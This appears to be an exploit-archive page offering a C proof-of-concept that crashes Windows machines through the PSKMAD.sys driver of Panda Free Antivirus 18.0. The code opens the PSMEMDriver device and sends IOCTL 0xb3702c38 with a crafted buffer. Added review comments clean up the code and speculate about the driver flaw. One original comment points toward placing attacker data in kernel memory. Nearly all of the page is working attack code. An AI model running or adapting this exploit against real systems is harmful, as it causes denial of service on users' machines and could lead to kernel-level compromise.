Panda Free Antivirus - 'PSKMAD.sys' Denial of Service



EKU-ID: 6557 CVE: OSVDB-ID:
Author: Peter Baris Published: 2017-05-05 Verified: Verified


/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
 
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
 
 
/* Win32 device path (\\.\PSMEMDriver) that main() opens through GetDeviceHandle(). */
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
 
/*
 * NOTE(review): DEVICE_NAME is a wide-character literal, so this cast to
 * LPCTSTR only yields a correctly typed string when the project is built
 * with UNICODE defined; in an ANSI build the cast hides a type mismatch.
 */
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
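/*
 * Open an existing device object for read/write access.
 *
 * FileName: path of the device to open (the file passes DEVICE_NAME).
 *
 * Returns the handle produced by CreateFile(); on failure that is
 * INVALID_HANDLE_VALUE (not NULL), so callers must compare against
 * INVALID_HANDLE_VALUE and may consult GetLastError().
 *
 * The original passed NULL for the DWORD dwFlagsAndAttributes argument and
 * 0 for the HANDLE hTemplateFile argument; the values are the same, but the
 * types were swapped, which draws pointer/integer conversion diagnostics.
 */
HANDLE GetDeviceHandle(LPCTSTR FileName) {
    return CreateFile(FileName,
        GENERIC_READ | GENERIC_WRITE,
        0,              /* dwShareMode: no sharing */
        NULL,           /* lpSecurityAttributes: default */
        OPEN_EXISTING,
        0,              /* dwFlagsAndAttributes: none */
        NULL);          /* hTemplateFile: unused */
}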
 
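/*
 * Reproducer for the PSKMAD.sys denial-of-service report in the header above.
 *
 * Flow: open the PSMEMDriver device, build a 0x800-byte user-mode buffer,
 * and send it with IOCTL 0xb3702c38 while declaring a zero input length.
 *
 * NOTE(review): the faulting code inside the driver is not shown on this
 * page. Presumably the IOCTL handler uses the supplied pointer without
 * validating the declared length - confirm against the vendor fix. The
 * driver-side remedy for this class of bug is strict length/pointer
 * validation in the IOCTL dispatch routine and a restrictive ACL on the
 * device object. For triage, the expected symptom per the title is a
 * bugcheck attributed to PSKMAD.sys.
 *
 * Returns 0 after the request and cleanup, 1 if the device cannot be opened
 * or the buffer cannot be allocated.
 */
int main()
{
    HANDLE hFile = NULL;
    PVOID64 lpInBuffer = NULL;
    /* DeviceIoControl() takes an LPDWORD here; the original ULONG64 was an
       incompatible pointer type. */
    DWORD lpBytesReturned = 0;
    PVOID64 BuffAddress = NULL;
    SIZE_T BufferSize = 0x800;

    printf("Trying the get the handle for the PSMEMDriver device.\r\n");

    hFile = GetDeviceHandle(FileName);

    /* CreateFile() signals failure with INVALID_HANDLE_VALUE, not NULL. */
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("Can't get the device handle, no BSoD today. 0x%X\r\n", (unsigned int)GetLastError());
        return 1;
    }

    /* Allocate memory for our buffer. It only ever holds data, so it is
       mapped read/write rather than executable. */
    lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (lpInBuffer == NULL) {
        printf("VirtualAlloc() failed. \r\n");
        /* The original returned here without closing the device handle. */
        CloseHandle(hFile);
        return 1;
    }

    /* Two overlapping 8-byte stores at offsets 0 and 4, then a fill from
       offset 8; statement order matters and is kept as in the original. */
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
    *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
    *(PULONG64)BuffAddress = (ULONG64)0x42424242;
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));

    RtlFillMemory(BuffAddress, BufferSize - 0x8, 0x41);

    /* The return value is deliberately not inspected, as in the original. */
    DeviceIoControl(hFile,
        0xb3702c38,
        lpInBuffer,
        0,     //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
        NULL,
        0,
        &lpBytesReturned,
        NULL);

    /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
    printf("Cleaning up.\r\n");
    /* MEM_RELEASE requires dwSize == 0; the original passed
       sizeof(lpInBuffer), which makes VirtualFree() fail and leaks the
       region. */
    VirtualFree((LPVOID)lpInBuffer, 0, MEM_RELEASE);
    CloseHandle(hFile);
    printf("Resources freed up.\r\n");
    return 0;
}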